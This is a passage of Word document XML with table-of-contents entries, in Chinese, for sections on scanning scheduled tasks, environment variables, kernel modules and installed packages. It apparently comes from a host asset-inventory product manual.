              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:szCs w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115166131" w:history="1">
            <w:r w:rsidR="007E0888" w:rsidRPr="00F8775E">
              <w:rPr>
                <w:rStyle w:val="af6"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.13 计划任务信息</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115166131 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>101</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4CD150C6" w14:textId="391ED8C4" w:rsidR="007E0888" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="10076"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115166132" w:history="1">
            <w:r w:rsidR="007E0888" w:rsidRPr="00F8775E">
              <w:rPr>
                <w:rStyle w:val="af6"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.13.1 计划任务信息查询结果</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115166132 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>102</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1514915A" w14:textId="64825E99" w:rsidR="007E0888" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="10076"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115166133" w:history="1">
            <w:r w:rsidR="007E0888" w:rsidRPr="00F8775E">
              <w:rPr>
                <w:rStyle w:val="af6"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.13.2 计划任务信息扫描</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115166133 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>105</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5118DFDE" w14:textId="69C4F28B" w:rsidR="007E0888" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="10076"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115166134" w:history="1">
            <w:r w:rsidR="007E0888" w:rsidRPr="00F8775E">
              <w:rPr>
                <w:rStyle w:val="af6"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.13.3 计划任务信息查询扫描状态</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115166134 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>107</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="42512E00" w14:textId="148F70A2" w:rsidR="007E0888" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:szCs w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115166135" w:history="1">
            <w:r w:rsidR="007E0888" w:rsidRPr="00F8775E">
              <w:rPr>
                <w:rStyle w:val="af6"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.14 环境变量信息</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115166135 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>107</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3F5E947C" w14:textId="49552EBF" w:rsidR="007E0888" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="10076"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115166136" w:history="1">
            <w:r w:rsidR="007E0888" w:rsidRPr="00F8775E">
              <w:rPr>
                <w:rStyle w:val="af6"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.14.1 环境变量信息查询结果</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115166136 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>107</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2A7334C3" w14:textId="77CB1E5C" w:rsidR="007E0888" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="10076"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115166137" w:history="1">
            <w:r w:rsidR="007E0888" w:rsidRPr="00F8775E">
              <w:rPr>
                <w:rStyle w:val="af6"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.14.2 环境变量信息扫描</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115166137 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>110</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="20BBDCE8" w14:textId="303BBF4F" w:rsidR="007E0888" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="10076"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115166138" w:history="1">
            <w:r w:rsidR="007E0888" w:rsidRPr="00F8775E">
              <w:rPr>
                <w:rStyle w:val="af6"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.14.3 环境变量信息查询扫描状态</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115166138 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>111</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="62166F5E" w14:textId="0AEED4A3" w:rsidR="007E0888" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:szCs w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115166139" w:history="1">
            <w:r w:rsidR="007E0888" w:rsidRPr="00F8775E">
              <w:rPr>
                <w:rStyle w:val="af6"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.15 内核模块信息</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115166139 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>112</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="11BB671B" w14:textId="3AF2DC29" w:rsidR="007E0888" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="10076"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115166140" w:history="1">
            <w:r w:rsidR="007E0888" w:rsidRPr="00F8775E">
              <w:rPr>
                <w:rStyle w:val="af6"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.15.1 内核模块信息查询结果</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115166140 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>112</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5D6F373F" w14:textId="6B84DFBE" w:rsidR="007E0888" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="10076"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115166141" w:history="1">
            <w:r w:rsidR="007E0888" w:rsidRPr="00F8775E">
              <w:rPr>
                <w:rStyle w:val="af6"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.15.2 内核模块信息扫描</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115166141 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>116</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0EA74DD2" w14:textId="4F6159D3" w:rsidR="007E0888" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="10076"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115166142" w:history="1">
            <w:r w:rsidR="007E0888" w:rsidRPr="00F8775E">
              <w:rPr>
                <w:rStyle w:val="af6"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.15.3 内核模块信息查询扫描状态</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115166142 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>117</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="43613446" w14:textId="4F080124" w:rsidR="007E0888" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
              <w:szCs w:val="22"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115166143" w:history="1">
            <w:r w:rsidR="007E0888" w:rsidRPr="00F8775E">
              <w:rPr>
                <w:rStyle w:val="af6"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.16 安装包信息</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115166143 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>117</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="031F4A1C" w14:textId="51FD99C6" w:rsidR="007E0888" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="10076"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115166144" w:history="1">
            <w:r w:rsidR="007E0888" w:rsidRPr="00F8775E">
              <w:rPr>
                <w:rStyle w:val="af6"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.16.1 安装包信息查询结果</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115166144 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>118</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="626ABE21" w14:textId="0ACD1B06" w:rsidR="007E0888" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="10076"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115166145" w:history="1">
            <w:r w:rsidR="007E0888" w:rsidRPr="00F8775E">
              <w:rPr>
                <w:rStyle w:val="af6"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.16.2 安装包信息扫描</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc115166145 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>122</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="340CED68" w14:textId="4764BCF2" w:rsidR="007E0888" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="10076"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi"/>
              <w:noProof/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc115166146" w:history="1">
            <w:r w:rsidR="007E0888" w:rsidRPr="00F8775E">
              <w:rPr>
                <w:rStyle w:val="af6"/>
                <w:noProof/>
              </w:rPr>
              <w:t>3.16.3 安装包信息查询扫描状态</w:t>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="007E0888">
              <w:rPr>
